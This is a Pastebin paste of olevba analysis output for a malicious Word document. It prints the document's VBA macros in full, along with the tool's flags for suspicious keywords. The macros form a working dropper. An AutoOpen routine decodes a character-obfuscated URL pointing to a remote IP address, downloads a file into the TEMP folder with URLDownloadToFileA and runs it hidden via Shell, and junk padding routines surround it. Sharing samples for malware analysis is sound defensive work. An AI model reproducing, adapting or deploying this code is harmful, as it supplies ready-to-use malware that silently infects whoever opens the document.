Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- XML:MAS---- 2773kxh.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 2773kxh.doc
- Type: Word2003_XML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- z4vF73d
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ÀâïàâÀ.bas
- in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String
- For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2
- IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1)
- Next
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ÀÏÀÂÏàâïâ.bas
- in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
- ByVal ÏÀÌÎÐâûà As String, _
- ByVal ÏÀÌÎÐâûàf As String, _
- ByVal ÏÀÌÎÐâûàfd As Long, _
- ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr
- #Else
- Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
- ByVal ÏÀÌÎÐâûà As String, _
- ByVal ÏÀÌÎÐâûàf As String, _
- ByVal ÏÀÌÎÐâûàfd As Long, _
- ByVal ÏÀÌÎÐâûàfds As Long) As Long
- #End If
- Sub z4vF73d()
- ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
- , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39))
- End Sub
- Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean
- âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&)
- ïðïàÀàï = Shell(Dm4y, 0)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: editdata.mso - OLE stream: u'VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub VJfmjcZhYHWzt89()
- Dim caEhbvHeVNIEE28 As Integer
- For caEhbvHeVNIEE28 = 8 To wn
- DoEvents
- Next caEhbvHeVNIEE28
- Dim DcsgpIlJKVLll87 As String
- DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65"
- End Sub
- Public Sub rEFykkBadCmlT28()
- Dim PxdhIsVstODSN96 As Integer
- For PxdhIsVstODSN96 = 6 To zo
- DoEvents
- Next PxdhIsVstODSN96
- Dim lyRYKztwOtcCv68 As String
- lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
- End Sub
- Public Sub xHCiwNdMbiMXH41()
- Dim DMjDUoNwJkvod99 As Integer
- For DMjDUoNwJkvod99 = 6 To AZ
- DoEvents
- Next DMjDUoNwJkvod99
- Dim MbOCKZMnWgyDP71 As String
- MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
- End Sub
- Public Sub pRsFNsbPhfYFW88()
- Dim hZLjOUpaCBMMS47 As Integer
- For hZLjOUpaCBMMS47 = 7 To Hd
- DoEvents
- Next hZLjOUpaCBMMS47
- Dim iqHqrfwpCwVKm36 As String
- iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
- End Sub
- Public Sub qWpQUsRUDvlHS43()
- Dim IdGlnffOOYXKa12 As Integer
- For IdGlnffOOYXKa12 = 4 To BO
- DoEvents
- Next IdGlnffOOYXKa12
- Dim jYPxUyallTLis72 As String
- jYPxUyallTLis72 = "WIblPzwJHhazc55"
- End Sub
- Public Sub ljeCsroJoUhyE78()
- Dim VlLLfBEgYlxNH62 As Integer
- For VlLLfBEgYlxNH62 = 3 To Uz
- DoEvents
- Next VlLLfBEgYlxNH62
- Dim BBwgLcWwNGMPI35 As String
- BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
- End Sub
- Public Sub htVyaunRmFwQL32()
- Dim TjUvVjOmkCGbi21 As Integer
- For TjUvVjOmkCGbi21 = 8 To QX
- DoEvents
- Next TjUvVjOmkCGbi21
- Dim rLdSRlDmsMiEB93 As String
- rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
- End Sub
- Public Sub yETfojXKzCRAj76()
- Dim pOEEEDavfUYoV65 As Integer
- For pOEEEDavfUYoV65 = 1 To ej
- DoEvents
- Next pOEEEDavfUYoV65
- Dim mgSnlzcAerxTa65 As String
- mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
- End Sub
- Public Sub pEXQlfifgpFAb63()
- Dim kIPGmTHKqlBzS46 As Integer
- For kIPGmTHKqlBzS46 = 1 To fc
- DoEvents
- Next kIPGmTHKqlBzS46
- Dim TmBfAKqohhFMq17 As String
- TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement